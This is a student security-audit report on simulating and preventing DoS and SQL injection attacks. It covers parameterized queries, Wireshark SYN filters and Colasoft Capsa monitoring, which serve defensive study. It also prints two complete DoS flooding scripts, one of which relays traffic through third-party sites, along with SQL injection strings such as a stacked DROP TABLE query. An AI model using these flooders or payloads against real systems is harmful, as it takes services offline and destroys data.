Professional Documents
Culture Documents
Simulation & Prevention of Dos Attacks and SQL Injection: Information Security Analysis and Audit
Simulation & Prevention of Dos Attacks and SQL Injection: Information Security Analysis and Audit
AUDIT
PROJECT REPORT
Submitted by-
Introduction
DDoS Attack
A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the
bandwidth or resources of a targeted system, usually one or more web servers. Such an
attack is often the result of multiple compromised systems (for example, a botnet) flooding
the targeted system with traffic. When a server is overloaded with connections, new
connections can no longer be accepted. The major advantages to an attacker of using a
distributed denial- of-service attack are that multiple machines can generate more attack
traffic than one machine, multiple attack machines are harder to turn off than one attack
machine, and that the behaviour of each attack machine can be stealthier, making it harder to
track and shut down.
SQL Injection
SQL injection is a code injection technique, used to attack data-driven applications, in which
malicious SQL statements are inserted into an entry field for execution (e.g. to dump the
database contents to the attacker). SQL injection must exploit a security vulnerability in an
application's software, for example, when user input is either incorrectly filtered for string
literal escape characters embedded in SQL statements or user input is not strongly typed and
unexpectedly executed. SQL injection attacks allow attackers to spoof identity, tamper with
existing data, cause repudiation issues such as voiding transactions or changing balances,
allow the complete disclosure of all data on the system, destroy the data or make it otherwise
unavailable, and become administrators of the database server.
Usually, attackers can use evil character like quote (’) to check whether they can do SQL
injection on the system. For example, the internal SQL query of the system is “SELECT *
FROM User WHERE username = ‘” + username + “’;” and an attacker’s input is “evil’s”.
This would generate a SQL query SELECT * FROM User WHERE username = ‘evil’s’
which will make a syntax error happen for executing query on database. After the attacker
finds the security bug of the system, he can utilize it to do further SQL injections to modify
the system maliciously.
Problem Statement
1. Open Web Application Security Project (OWASP), the globally recognized
standard awareness document for developers and web application security
consistently points out that database injection and Denial of Service (DoS) Attacks
are the greatest security risk to modern web applications.
2. Acknowledging these growing web security risks, we aim to suggest security
patches that can help safeguard organizations and critical information.
Literature Review:
Aim
Simulate a DoS and SQL Injection attacks and observe system/application behaviour during
attack period and then suggest and recommend robust defence and detection mechanism
against DDoS Attack and SQL Injections.
Software Used
• ColaSoft Capsa
• phpMyAdmin
• XAMMP
• Wireshark
Proposed Methodology
● DoS Attack Prevention: The project shall demonstrate the functionality of software tools
such as Capsa’s Enterprise Edition, Colasoft Capsa and Capsa’s Alarm Explorer to detect
and mitigate DoS attacks.
● SQL Injection Attack Simulation: To simulate an SQL Injection, we plan on creating a
vulnerable webpage, specifically to access its database using myPhpAdmin and XAMPP.
● SQL Injection Attack Prevention: We plan on using prepared statements with variable
binding (aka parameterized queries) to first define all the SQL code, and then pass in each
parameter to the query later. This coding style allows the database to distinguish between
code and data, regardless of what user input is supplied. Prepared statements ensure that
an attacker is not able to manipulate the intent of a query and gain access.
● DoS Attack Simulation: To simulate DoS attack on a system in a given WiFi network, we
plan on using Wireshark to analyse incoming packets target’s device.
Implementation:
Prevention of SQLi:
We’ve created a website of our own to show how the attackers use vulnerable
userinputs to make an sql injection attack successful. After that, we used
parameterized queries in our sql statements to prevent the attackers from taking
down our website.
Fig 5 & 6- The attacker tries to manipulate SQL commands to access database by entering ‘ or ‘1’
‘ =1 which further changed the query to a query which contains “or” conditions which targets sql
to show all the records.
Another example of what sql injection can do:
Fig 7 & 8- Suppose instead of mysqli_query function, we use mysqli_multi_query function. Clearly, the
statement ; DROP TABLE important; SELECT * FROM 'users' where '1' = '1 contains more than one
query. One of these queries triggers the Database to drop the table called “important”.
Fig 9- Prepared statements ensure that an attacker is not able to manipulate the intent of a query
and gain access.
Fig 10 & 11- The following screenshot demonstrates the capability of such prepared code fragments to
limit access to the database.
After attack:
Code:
Code:
1)#!/usr/bin/python3
# -*- coding: utf-8 -*-
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/
26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913
Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/
20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko)
Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/
20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/
20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent':
random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent:
"+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--
packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m Hammer Dos Script v.1 http://www.canyalcin.com/
It is the end user's responsibility to obey all applicable laws.
It is just for server testing script. Your ip is visible. \n
usage : python3 hammer.py [-s] [-p] [-t]
-h : help
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const",
dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
2)import socket
import threading
attack_num = 0
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
s.close()
global attack_num
attack_num += 1
print(attack_num)
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()
◦
Detection using Wireshark:
Look out for an immense number of TCP connection requests. The proper display filter is
tcp.flags.syn == 1 and tcp.flags.ack == 0
The server, that is under attack, will respond with a smaller number of SYN/ACKs. These
can be spotted with the display filter tcp.flags.syn == 1 and tcp.flags.ack == 1. Try to
compare the number of SYNs with the number of SYN/ACKs. As long as the numbers are
identical your firewall or server is holding up.
Fig 12 & 13- Since, in the above case, the numbers are identical, the firewall/server is doing a
good job of keeping the system safe.
-We can also view Wireshark’s graphs for a visual representation of the uptick in
traffic.
-The overview of your network will make spikes in traffic quickly noticeable. You
should be able to notice an uptick in the global utilization graph, as well as the total
traffic by bytes
-During flooding, it shows a massive spike in overall packets from near 0 to about a
thousands packets a second.
Using Colasoft Capsa:
DoS attacks are easy to recognise but extremely difficult to mitigate on a personal device. It
is possible to use software tools like Colasoft Capsa which make it easy and quick to detect
and locate network attacks. As such, the first point of call for detecting a DoS attack is the
dashboard. The overview of your network will make spikes in traffic quickly noticeable. You
should be able to notice an uptick in the global utilization graph, as well as the total traffic by
bytes:
Admins can use Capsa’s Alarm Explorer to get an instant notification when unusual traffic
is detected:
Alternatively, Capsa’s Enterprise Edition can allow system/network administrators to
immediately start a security analysis profile, which has a dedicated DoS attack tab. It also
permits for the admins to look at TCP conversation details to quickly decode and verify
attacks:
Going further we would like to remind the reader of the illegal and un-predictable nature of
a DoS/DDoS attack. So some other general security recommendations for networks and
businesses are stated as follows:
Conclusion
SQL Injection and DoS attacks are two vastly different mode of attacks that have time and
again jeopardised businesses because of their tendency to be extremely invasive and highly
unpredictable. Through this project, we have attempted to simulate the two dangerous attacks
in well-monitored and legal environments to gather deep insight to their functioning. Our
observations have concluded that conducting such attacks only become difficult if the
target’s device does not have proper well-functioning network security mechanisms in place.
The acknowledgement of the same has led to us making practical security recommendations
to help better safe-guard networks and devices.
Future prospects
Cyber Attacks like SQL Injection and DoS pose great threat to all existent websites that
make use of SQL databases. Hence, it is extremely important to further research into both
cases to make sure that databases with sensitive information, complex network architectures
and personal devices stay secure.
In the case of SQL Injection, the adopted design can be improved to incorporate features that
can prevent attackers from signing up, using the database and accessing content. Various
code injection techniques may be developed over time and the security mechanisms must
constantly evolve to make sure that each of these fraudulent attempts is prevented. In
addition to this different layers of access based on authorisation could be incorporated to
ensure confidentiality at each level. Owing to their highly unpredictable nature, DoS attacks
can take organisations completely by surprise. It is important to support and promote the
evolution of various network security tools. It is important to make sure such incidents be
taken up seriously as cyber security violations and free tools must be distributed to small
businesses and other networks for additional protection.
References
1. Voitovych, Olesya & Yuvkovetskyi, O. & Kupershtein, Leonid. (2016). SQL injection
prevention system. 1-4. 10.1109/UkrMiCo.2016.7739642.
2. Mohd Yunus, Mohd Amin & Brohan, Muhammad & Mohd Nawi, Nazri & Salwana,
Ely & Najib, Nurhakimah & Liang, Chan. (2018). Review of SQL Injection:
Problems and Prevention. JOIV: International Journal on Informatics Visualization. 2.
215. 10.30630/joiv.2.3-2.144.
3. Mahapatra, Rajendra. (2012). A Survey Of Sql Injection Countermeasures.
International Journal of Computer Science & Engineering Survey. 3. 55-74. 10.5121/
ijcses.2012.3305.
4. S. Som, S. Sinha, R. Kataria, “Study On SQL Injection Attacks: Mode, Detection And
Prevention”, International Journal of Engineering Applied Sciences and Technology
(IJEAST), Vol. 1, Issue 8, ISSN No. 2455-2143, 2016.
5. Mukhopadhyay, Debajyoti & Oh, Byung-Jun & Shim, Sang-Heon & Kim, Young-
Chon. (2010). A Study on Recent Approaches in Handling DDoS Attacks.
6. Yinan Jing, Jingtao Li, Xueping Wang, Xiaochun Xiao and Gendu Zhang, "A
Distributed-Log-based IP Traceback Scheme to Defeat DDoS Attacks," 20th
International Conference on Advanced Information Networking and Applications -
Volume 1 (AINA'06), Vienna, 2006, pp. 25-32, doi: 10.1109/AINA.2006.22.
7. Tao Peng, Christopher Leckie, Kotagiri Ramamohanarao; Protection from distributed
denial of service attacks using history-based IP filtering; IEEE International
Conference on Communications, 11-15 May 2003; pp.482 - 486.
8. Peng, T, Leckie, C, Ramamohanarao, K. Survey of network-based defense
mechanisms countering the DoS and DDoS problems. ACM Comput Surv 2007;
39(1): 3
9. Zargar, ST, Joshi, J, Tipper, D. A survey of defense mechanisms against distributed
denial of service (DDoS) flooding attacks. IEEE Commun Surv Tut 2013; 15(4):
2046– 2069.
10. Mahjabin, Tasnuva & Xiao, Yang & Sun, Guang & Jiang, Wangdong. (2017). A survey
of distributed denial-of-service attack, prevention, and mitigation techniques.
International Journal of Distributed Sensor Networks. 13. 155014771774146.
10.1177/1550147717741463.